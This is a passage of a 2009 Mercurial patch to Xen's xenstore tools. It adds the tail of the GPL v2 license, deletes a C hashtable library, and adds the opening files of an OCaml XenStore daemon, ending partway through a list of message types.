+patents or other property right claims or to contest validity of any
+such claims; this section has the sole purpose of protecting the
+integrity of the free software distribution system, which is
+implemented by public license practices.  Many people have made
+generous contributions to the wide range of software distributed
+through that system in reliance on consistent application of that
+system; it is up to the author/donor to decide if he or she is willing
+to distribute software through any other system and a licensee cannot
+impose that choice.
+
+This section is intended to make thoroughly clear what is believed to
+be a consequence of the rest of this License.
+
+  8. If the distribution and/or use of the Program is restricted in
+certain countries either by patents or by copyrighted interfaces, the
+original copyright holder who places the Program under this License
+may add an explicit geographical distribution limitation excluding
+those countries, so that distribution is permitted only in or among
+countries not thus excluded.  In such case, this License incorporates
+the limitation as if written in the body of this License.
+
+  9. The Free Software Foundation may publish revised and/or new versions
+of the General Public License from time to time.  Such new versions will
+be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
+
+Each version is given a distinguishing version number.  If the Program
+specifies a version number of this License which applies to it and "any
+later version", you have the option of following the terms and conditions
+either of that version or of any later version published by the Free
+Software Foundation.  If the Program does not specify a version number of
+this License, you may choose any version ever published by the Free Software
+Foundation.
+
+  10. If you wish to incorporate parts of the Program into other free
+programs whose distribution conditions are different, write to the author
+to ask for permission.  For software which is copyrighted by the Free
+Software Foundation, write to the Free Software Foundation; we sometimes
+make exceptions for this.  Our decision will be guided by the two goals
+of preserving the free status of all derivatives of our free software and
+of promoting the sharing and reuse of software generally.
+
+                           NO WARRANTY
+
+  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
+FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
+OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
+PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
+OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
+TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
+PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
+REPAIR OR CORRECTION.
+
+  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
+REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
+INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
+OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
+TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
+YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
+PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
+POSSIBILITY OF SUCH DAMAGES.
+
+                    END OF TERMS AND CONDITIONS
+
+           How to Apply These Terms to Your New Programs
+
+  If you develop a new program, and you want it to be of the greatest
+possible use to the public, the best way to achieve this is to make it
+free software which everyone can redistribute and change under these terms.
+
+  To do so, attach the following notices to the program.  It is safest
+to attach them to the start of each source file to most effectively
+convey the exclusion of warranty; and each file should have at least
+the "copyright" line and a pointer to where the full notice is found.
+
+    <one line to give the program's name and a brief idea of what it does.>
+    Copyright (C) <year>  <name of author>
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License along
+    with this program; if not, write to the Free Software Foundation, Inc.,
+    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+
+Also add information on how to contact you by electronic and paper mail.
+
+If the program is interactive, make it output a short notice like this
+when it starts in an interactive mode:
+
+    Gnomovision version 69, Copyright (C) year name of author
+    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
+    This is free software, and you are welcome to redistribute it
+    under certain conditions; type `show c' for details.
+
+The hypothetical commands `show w' and `show c' should show the appropriate
+parts of the General Public License.  Of course, the commands you use may
+be called something other than `show w' and `show c'; they could even be
+mouse-clicks or menu items--whatever suits your program.
+
+You should also get your employer (if you work as a programmer) or your
+school, if any, to sign a "copyright disclaimer" for the program, if
+necessary.  Here is a sample; alter the names:
+
+  Yoyodyne, Inc., hereby disclaims all copyright interest in the program
+  `Gnomovision' (which makes passes at compilers) written by James Hacker.
+
+  <signature of Ty Coon>, 1 April 1989
+  Ty Coon, President of Vice
+
+This General Public License does not permit incorporating your program into
+proprietary programs.  If your program is a subroutine library, you may
+consider it more useful to permit linking proprietary applications with the
+library.  If this is what you want to do, use the GNU Lesser General
+Public License instead of this License.
diff -r 10a8fae412c5 tools/xenstore/hashtable.c
--- a/tools/xenstore/hashtable.c        Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,285 +0,0 @@
-/* Copyright (C) 2004 Christopher Clark <firstname.lastname@xxxxxxxxxxxx> */
-
-#include "hashtable.h"
-#include "hashtable_private.h"
-#include <stdlib.h>
-#include <stdio.h>
-#include <string.h>
-#include <math.h>
-#include <stdint.h>
-
-/*
-Credit for primes table: Aaron Krowne
- http://br.endernet.org/~akrowne/
- http://planetmath.org/encyclopedia/GoodHashTablePrimes.html
-*/
-static const unsigned int primes[] = {
-53, 97, 193, 389,
-769, 1543, 3079, 6151,
-12289, 24593, 49157, 98317,
-196613, 393241, 786433, 1572869,
-3145739, 6291469, 12582917, 25165843,
-50331653, 100663319, 201326611, 402653189,
-805306457, 1610612741
-};
-const unsigned int prime_table_length = sizeof(primes)/sizeof(primes[0]);
-const unsigned int max_load_factor = 65; /* percentage */
-
-/*****************************************************************************/
-struct hashtable *
-create_hashtable(unsigned int minsize,
-                 unsigned int (*hashf) (void*),
-                 int (*eqf) (void*,void*))
-{
-    struct hashtable *h;
-    unsigned int pindex, size = primes[0];
-
-    /* Check requested hashtable isn't too large */
-    if (minsize > (1u << 30)) return NULL;
-
-    /* Enforce size as prime */
-    for (pindex=0; pindex < prime_table_length; pindex++) {
-        if (primes[pindex] > minsize) { size = primes[pindex]; break; }
-    }
-
-    h = (struct hashtable *)calloc(1, sizeof(struct hashtable));
-    if (NULL == h)
-        goto err0;
-    h->table = (struct entry **)calloc(size, sizeof(struct entry *));
-    if (NULL == h->table)
-        goto err1;
-
-    h->tablelength  = size;
-    h->primeindex   = pindex;
-    h->entrycount   = 0;
-    h->hashfn       = hashf;
-    h->eqfn         = eqf;
-    h->loadlimit    = (unsigned int)(((uint64_t)size * max_load_factor) / 100);
-    return h;
-
-err1:
-   free(h);
-err0:
-   return NULL;
-}
-
-/*****************************************************************************/
-unsigned int
-hash(struct hashtable *h, void *k)
-{
-    /* Aim to protect against poor hash functions by adding logic here
-     * - logic taken from java 1.4 hashtable source */
-    unsigned int i = h->hashfn(k);
-    i += ~(i << 9);
-    i ^=  ((i >> 14) | (i << 18)); /* >>> */
-    i +=  (i << 4);
-    i ^=  ((i >> 10) | (i << 22)); /* >>> */
-    return i;
-}
-
-/*****************************************************************************/
-static int
-hashtable_expand(struct hashtable *h)
-{
-    /* Double the size of the table to accomodate more entries */
-    struct entry **newtable;
-    struct entry *e;
-    struct entry **pE;
-    unsigned int newsize, i, index;
-    /* Check we're not hitting max capacity */
-    if (h->primeindex == (prime_table_length - 1)) return 0;
-    newsize = primes[++(h->primeindex)];
-
-    newtable = (struct entry **)calloc(newsize, sizeof(struct entry*));
-    if (NULL != newtable)
-    {
-        /* This algorithm is not 'stable'. ie. it reverses the list
-         * when it transfers entries between the tables */
-        for (i = 0; i < h->tablelength; i++) {
-            while (NULL != (e = h->table[i])) {
-                h->table[i] = e->next;
-                index = indexFor(newsize,e->h);
-                e->next = newtable[index];
-                newtable[index] = e;
-            }
-        }
-        free(h->table);
-        h->table = newtable;
-    }
-    /* Plan B: realloc instead */
-    else 
-    {
-        newtable = (struct entry **)
-                   realloc(h->table, newsize * sizeof(struct entry *));
-        if (NULL == newtable) { (h->primeindex)--; return 0; }
-        h->table = newtable;
-        memset(newtable[h->tablelength], 0, newsize - h->tablelength);
-        for (i = 0; i < h->tablelength; i++) {
-            for (pE = &(newtable[i]), e = *pE; e != NULL; e = *pE) {
-                index = indexFor(newsize,e->h);
-                if (index == i)
-                {
-                    pE = &(e->next);
-                }
-                else
-                {
-                    *pE = e->next;
-                    e->next = newtable[index];
-                    newtable[index] = e;
-                }
-            }
-        }
-    }
-    h->tablelength = newsize;
-    h->loadlimit   = (unsigned int)
-        (((uint64_t)newsize * max_load_factor) / 100);
-    return -1;
-}
-
-/*****************************************************************************/
-unsigned int
-hashtable_count(struct hashtable *h)
-{
-    return h->entrycount;
-}
-
-/*****************************************************************************/
-int
-hashtable_insert(struct hashtable *h, void *k, void *v)
-{
-    /* This method allows duplicate keys - but they shouldn't be used */
-    unsigned int index;
-    struct entry *e;
-    if (++(h->entrycount) > h->loadlimit)
-    {
-        /* Ignore the return value. If expand fails, we should
-         * still try cramming just this value into the existing table
-         * -- we may not have memory for a larger table, but one more
-         * element may be ok. Next time we insert, we'll try expanding again.*/
-        hashtable_expand(h);
-    }
-    e = (struct entry *)calloc(1, sizeof(struct entry));
-    if (NULL == e) { --(h->entrycount); return 0; } /*oom*/
-    e->h = hash(h,k);
-    index = indexFor(h->tablelength,e->h);
-    e->k = k;
-    e->v = v;
-    e->next = h->table[index];
-    h->table[index] = e;
-    return -1;
-}
-
-/*****************************************************************************/
-void * /* returns value associated with key */
-hashtable_search(struct hashtable *h, void *k)
-{
-    struct entry *e;
-    unsigned int hashvalue, index;
-    hashvalue = hash(h,k);
-    index = indexFor(h->tablelength,hashvalue);
-    e = h->table[index];
-    while (NULL != e)
-    {
-        /* Check hash value to short circuit heavier comparison */
-        if ((hashvalue == e->h) && (h->eqfn(k, e->k))) return e->v;
-        e = e->next;
-    }
-    return NULL;
-}
-
-/*****************************************************************************/
-void * /* returns value associated with key */
-hashtable_remove(struct hashtable *h, void *k)
-{
-    /* TODO: consider compacting the table when the load factor drops enough,
-     *       or provide a 'compact' method. */
-
-    struct entry *e;
-    struct entry **pE;
-    void *v;
-    unsigned int hashvalue, index;
-
-    hashvalue = hash(h,k);
-    index = indexFor(h->tablelength,hash(h,k));
-    pE = &(h->table[index]);
-    e = *pE;
-    while (NULL != e)
-    {
-        /* Check hash value to short circuit heavier comparison */
-        if ((hashvalue == e->h) && (h->eqfn(k, e->k)))
-        {
-            *pE = e->next;
-            h->entrycount--;
-            v = e->v;
-            freekey(e->k);
-            free(e);
-            return v;
-        }
-        pE = &(e->next);
-        e = e->next;
-    }
-    return NULL;
-}
-
-/*****************************************************************************/
-/* destroy */
-void
-hashtable_destroy(struct hashtable *h, int free_values)
-{
-    unsigned int i;
-    struct entry *e, *f;
-    struct entry **table = h->table;
-    if (free_values)
-    {
-        for (i = 0; i < h->tablelength; i++)
-        {
-            e = table[i];
-            while (NULL != e)
-            { f = e; e = e->next; freekey(f->k); free(f->v); free(f); }
-        }
-    }
-    else
-    {
-        for (i = 0; i < h->tablelength; i++)
-        {
-            e = table[i];
-            while (NULL != e)
-            { f = e; e = e->next; freekey(f->k); free(f); }
-        }
-    }
-    free(h->table);
-    free(h);
-}
-
-/*
- * Copyright (c) 2002, Christopher Clark
- * All rights reserved.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 
- * * Redistributions of source code must retain the above copyright
- * notice, this list of conditions and the following disclaimer.
- * 
- * * Redistributions in binary form must reproduce the above copyright
- * notice, this list of conditions and the following disclaimer in the
- * documentation and/or other materials provided with the distribution.
- * 
- * * Neither the name of the original author; nor the names of any contributors
- * may be used to endorse or promote products derived from this software
- * without specific prior written permission.
- * 
- * 
- * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
- * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
- * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
- * A PARTICULAR PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE COPYRIGHT OWNER
- * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
- * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
- * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
- * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
- * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
- * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
- * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
diff -r 10a8fae412c5 tools/xenstore/hashtable.h
--- a/tools/xenstore/hashtable.h        Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,199 +0,0 @@
-/* Copyright (C) 2002 Christopher Clark <firstname.lastname@xxxxxxxxxxxx> */
-
-#ifndef __HASHTABLE_CWC22_H__
-#define __HASHTABLE_CWC22_H__
-
-struct hashtable;
-
-/* Example of use:
- *
- *      struct hashtable  *h;
- *      struct some_key   *k;
- *      struct some_value *v;
- *
- *      static unsigned int         hash_from_key_fn( void *k );
- *      static int                  keys_equal_fn ( void *key1, void *key2 );
- *
- *      h = create_hashtable(16, hash_from_key_fn, keys_equal_fn);
- *      k = (struct some_key *)     malloc(sizeof(struct some_key));
- *      v = (struct some_value *)   malloc(sizeof(struct some_value));
- *
- *      (initialise k and v to suitable values)
- * 
- *      if (! hashtable_insert(h,k,v) )
- *      {     exit(-1);               }
- *
- *      if (NULL == (found = hashtable_search(h,k) ))
- *      {    printf("not found!");                  }
- *
- *      if (NULL == (found = hashtable_remove(h,k) ))
- *      {    printf("Not found\n");                 }
- *
- */
-
-/* Macros may be used to define type-safe(r) hashtable access functions, with
- * methods specialized to take known key and value types as parameters.
- * 
- * Example:
- *
- * Insert this at the start of your file:
- *
- * DEFINE_HASHTABLE_INSERT(insert_some, struct some_key, struct some_value);
- * DEFINE_HASHTABLE_SEARCH(search_some, struct some_key, struct some_value);
- * DEFINE_HASHTABLE_REMOVE(remove_some, struct some_key, struct some_value);
- *
- * This defines the functions 'insert_some', 'search_some' and 'remove_some'.
- * These operate just like hashtable_insert etc., with the same parameters,
- * but their function signatures have 'struct some_key *' rather than
- * 'void *', and hence can generate compile time errors if your program is
- * supplying incorrect data as a key (and similarly for value).
- *
- * Note that the hash and key equality functions passed to create_hashtable
- * still take 'void *' parameters instead of 'some key *'. This shouldn't be
- * a difficult issue as they're only defined and passed once, and the other
- * functions will ensure that only valid keys are supplied to them.
- *
- * The cost for this checking is increased code size and runtime overhead
- * - if performance is important, it may be worth switching back to the
- * unsafe methods once your program has been debugged with the safe methods.
- * This just requires switching to some simple alternative defines - eg:
- * #define insert_some hashtable_insert
- *
- */
-
-/*****************************************************************************
- * create_hashtable
-   
- * @name                    create_hashtable
- * @param   minsize         minimum initial size of hashtable
- * @param   hashfunction    function for hashing keys
- * @param   key_eq_fn       function for determining key equality
- * @return                  newly created hashtable or NULL on failure
- */
-
-struct hashtable *
-create_hashtable(unsigned int minsize,
-                 unsigned int (*hashfunction) (void*),
-                 int (*key_eq_fn) (void*,void*));
-
-/*****************************************************************************
- * hashtable_insert
-   
- * @name        hashtable_insert
- * @param   h   the hashtable to insert into
- * @param   k   the key - hashtable claims ownership and will free on removal
- * @param   v   the value - does not claim ownership
- * @return      non-zero for successful insertion
- *
- * This function will cause the table to expand if the insertion would take
- * the ratio of entries to table size over the maximum load factor.
- *
- * This function does not check for repeated insertions with a duplicate key.
- * The value returned when using a duplicate key is undefined -- when
- * the hashtable changes size, the order of retrieval of duplicate key
- * entries is reversed.
- * If in doubt, remove before insert.
- */
-
-int 
-hashtable_insert(struct hashtable *h, void *k, void *v);
-
-#define DEFINE_HASHTABLE_INSERT(fnname, keytype, valuetype) \
-int fnname (struct hashtable *h, keytype *k, valuetype *v) \
-{ \
-    return hashtable_insert(h,k,v); \
-}
-
-/*****************************************************************************
- * hashtable_search
-   
- * @name        hashtable_search
- * @param   h   the hashtable to search
- * @param   k   the key to search for  - does not claim ownership
- * @return      the value associated with the key, or NULL if none found
- */
-
-void *
-hashtable_search(struct hashtable *h, void *k);
-
-#define DEFINE_HASHTABLE_SEARCH(fnname, keytype, valuetype) \
-valuetype * fnname (struct hashtable *h, keytype *k) \
-{ \
-    return (valuetype *) (hashtable_search(h,k)); \
-}
-
-/*****************************************************************************
- * hashtable_remove
-   
- * @name        hashtable_remove
- * @param   h   the hashtable to remove the item from
- * @param   k   the key to search for  - does not claim ownership
- * @return      the value associated with the key, or NULL if none found
- */
-
-void * /* returns value */
-hashtable_remove(struct hashtable *h, void *k);
-
-#define DEFINE_HASHTABLE_REMOVE(fnname, keytype, valuetype) \
-valuetype * fnname (struct hashtable *h, keytype *k) \
-{ \
-    return (valuetype *) (hashtable_remove(h,k)); \
-}
-
-
-/*****************************************************************************
- * hashtable_count
-   
- * @name        hashtable_count
- * @param   h   the hashtable
- * @return      the number of items stored in the hashtable
- */
-unsigned int
-hashtable_count(struct hashtable *h);
-
-
-/*****************************************************************************
- * hashtable_destroy
-   
- * @name        hashtable_destroy
- * @param   h   the hashtable
- * @param       free_values     whether to call 'free' on the remaining values
- */
-
-void
-hashtable_destroy(struct hashtable *h, int free_values);
-
-#endif /* __HASHTABLE_CWC22_H__ */
-
-/*
- * Copyright (c) 2002, Christopher Clark
- * All rights reserved.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 
- * * Redistributions of source code must retain the above copyright
- * notice, this list of conditions and the following disclaimer.
- * 
- * * Redistributions in binary form must reproduce the above copyright
- * notice, this list of conditions and the following disclaimer in the
- * documentation and/or other materials provided with the distribution.
- * 
- * * Neither the name of the original author; nor the names of any contributors
- * may be used to endorse or promote products derived from this software
- * without specific prior written permission.
- * 
- * 
- * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
- * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
- * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
- * A PARTICULAR PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE COPYRIGHT OWNER
- * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
- * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
- * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
- * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
- * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
- * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
- * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
diff -r 10a8fae412c5 tools/xenstore/hashtable_private.h
--- a/tools/xenstore/hashtable_private.h        Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,85 +0,0 @@
-/* Copyright (C) 2002, 2004 Christopher Clark 
<firstname.lastname@xxxxxxxxxxxx> */
-
-#ifndef __HASHTABLE_PRIVATE_CWC22_H__
-#define __HASHTABLE_PRIVATE_CWC22_H__
-
-#include "hashtable.h"
-
-/*****************************************************************************/
-struct entry
-{
-    void *k, *v;
-    unsigned int h;
-    struct entry *next;
-};
-
-struct hashtable {
-    unsigned int tablelength;
-    struct entry **table;
-    unsigned int entrycount;
-    unsigned int loadlimit;
-    unsigned int primeindex;
-    unsigned int (*hashfn) (void *k);
-    int (*eqfn) (void *k1, void *k2);
-};
-
-/*****************************************************************************/
-unsigned int
-hash(struct hashtable *h, void *k);
-
-/*****************************************************************************/
-/* indexFor */
-static inline unsigned int
-indexFor(unsigned int tablelength, unsigned int hashvalue) {
-    return (hashvalue % tablelength);
-};
-
-/* Only works if tablelength == 2^N */
-/*static inline unsigned int
-indexFor(unsigned int tablelength, unsigned int hashvalue)
-{
-    return (hashvalue & (tablelength - 1u));
-}
-*/
-
-/*****************************************************************************/
-#define freekey(X) free(X)
-/*define freekey(X) ; */
-
-
-/*****************************************************************************/
-
-#endif /* __HASHTABLE_PRIVATE_CWC22_H__*/
-
-/*
- * Copyright (c) 2002, Christopher Clark
- * All rights reserved.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 
- * * Redistributions of source code must retain the above copyright
- * notice, this list of conditions and the following disclaimer.
- * 
- * * Redistributions in binary form must reproduce the above copyright
- * notice, this list of conditions and the following disclaimer in the
- * documentation and/or other materials provided with the distribution.
- * 
- * * Neither the name of the original author; nor the names of any contributors
- * may be used to endorse or promote products derived from this software
- * without specific prior written permission.
- * 
- * 
- * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
- * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
- * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
- * A PARTICULAR PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE COPYRIGHT OWNER
- * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
- * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
- * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
- * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
- * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
- * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
- * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
diff -r 10a8fae412c5 tools/xenstore/interface.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/interface.ml       Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,27 @@
+(* 
+    Interface for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+class virtual interface =
+object
+  method virtual can_read : bool
+  method virtual can_write : bool
+  method virtual destroy : unit
+  method virtual read : string -> int -> int -> int
+  method virtual write : string -> int -> int -> int
+end
diff -r 10a8fae412c5 tools/xenstore/main.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/main.ml    Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,85 @@
+(* 
+    Main functions for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+(* Handle event *)
+let handle_event xenstored =
+  let port = Eventchan.pending () in
+  if port <> Constants.null_file_descr
+  then (
+    if port = xenstored#virq_port
+    then (
+      let domains = xenstored#domains#cleanup in
+      if List.length domains > 0
+      then (
+        List.iter (fun domain -> if domain#is_dying then 
xenstored#remove_domain domain) domains;
+        xenstored#watches#fire_watches "@releaseDomain" false false
+      )
+    );
+    if Eventchan.unmask port = - 1 then Utils.barf_perror "Failed to write to 
event channel"
+  )
+  else Utils.barf_perror ("Failed to read from event channel")
+
+(* Handle I/O for domains *)
+let handle_io xenstored =
+  let handle_io_for_domain domain =
+    try
+      if domain#can_read then domain#read;
+      if domain#has_input_message
+      then (
+        Trace.io domain#id "IN" (Os.get_time ()) (List.hd 
domain#input_messages);
+        let msg_type = Message.message_type_to_string (List.hd 
domain#input_messages).Message.header.Message.message_type
+        and msg_length = (List.hd 
domain#input_messages).Message.header.Message.length in
+        if xenstored#options.Option.verbose then (Printf.printf "Got message 
%s len %d from %d\n" msg_type msg_length domain#id; flush stdout);
+        Process.process xenstored domain
+      );
+      while domain#can_write do
+        let msg_type = Message.message_type_to_string (List.hd 
domain#output_messages).Message.header.Message.message_type
+        and msg_payload = (List.hd domain#output_messages).Message.payload in
+        if xenstored#options.Option.verbose then (Printf.printf "Writing msg 
%s (%s) out to %d\n" msg_type msg_payload domain#id; flush stdout);
+        Trace.io domain#id "OUT" (Os.get_time ()) (List.hd 
domain#output_messages);
+        domain#write
+      done
+    with Constants.Xs_error (Constants.EIO, _, _) -> (
+          (try if not (Domain.is_unprivileged domain) then while 
domain#can_write do domain#write done with _ -> ());
+          xenstored#remove_domain domain;
+          if Domain.is_unprivileged domain then xenstored#watches#fire_watches 
"@releaseDomain" false false
+        )
+  in
+  List.iter handle_io_for_domain xenstored#domains#domains
+
+(* Main method *)
+let main =
+  let options = Option.parse () in
+  Option.check_options options;
+  
+  let store = new Store.store in
+  let xenstored = new Xenstored.xenstored options store in
+  
+  Os.init ();
+  
+  let event_chan = xenstored#initialise_domains in
+  
+  while true do
+    Os.check_connections xenstored event_chan;
+    if Os.check_event_chan event_chan then handle_event xenstored;
+    handle_io xenstored
+  done
+
+(* Register callback for main function *)
+let _ = Callback.register "main" main
diff -r 10a8fae412c5 tools/xenstore/main_c.c
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/main_c.c   Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,49 @@
+/*
+    C main function for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*/
+
+#include <stdio.h>
+#include <errno.h>
+#include <unistd.h>
+#include <sys/mman.h>
+
+#include <xenctrl.h>
+
+#include <caml/mlvalues.h>
+#include <caml/callback.h>
+#include <caml/memory.h>
+#include <caml/alloc.h>
+
+int main(int argc, char *argv[], char *envp[])
+{
+    value *val;
+
+    /* Wait before things might hang up */
+    sleep(1);
+
+    caml_startup(argv);
+    val = caml_named_value("main");
+    if (!val) {
+        printf("Couldn't find Caml main");
+        return 1;
+    }
+
+    caml_callback(*val, Val_int(0));
+
+    return 0;
+}
diff -r 10a8fae412c5 tools/xenstore/message.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/message.ml Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,184 @@
+(* 
+    Messages for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+let header_size = 16;
+
+(* XenStore message types *)
+type xs_message_type =
+  | XS_DEBUG
+  | XS_DIRECTORY
+  | XS_READ
+  | XS_GET_PERMS
+  | XS_WATCH
+  | XS_UNWATCH
+  | XS_TRANSACTION_START
+  | XS_TRANSACTION_END
+  | XS_INTRODUCE
+  | XS_RELEASE
+  | XS_GET_DOMAIN_PATH
+  | XS_WRITE
+  | XS_MKDIR
+  | XS_RM
+  | XS_SET_PERMS
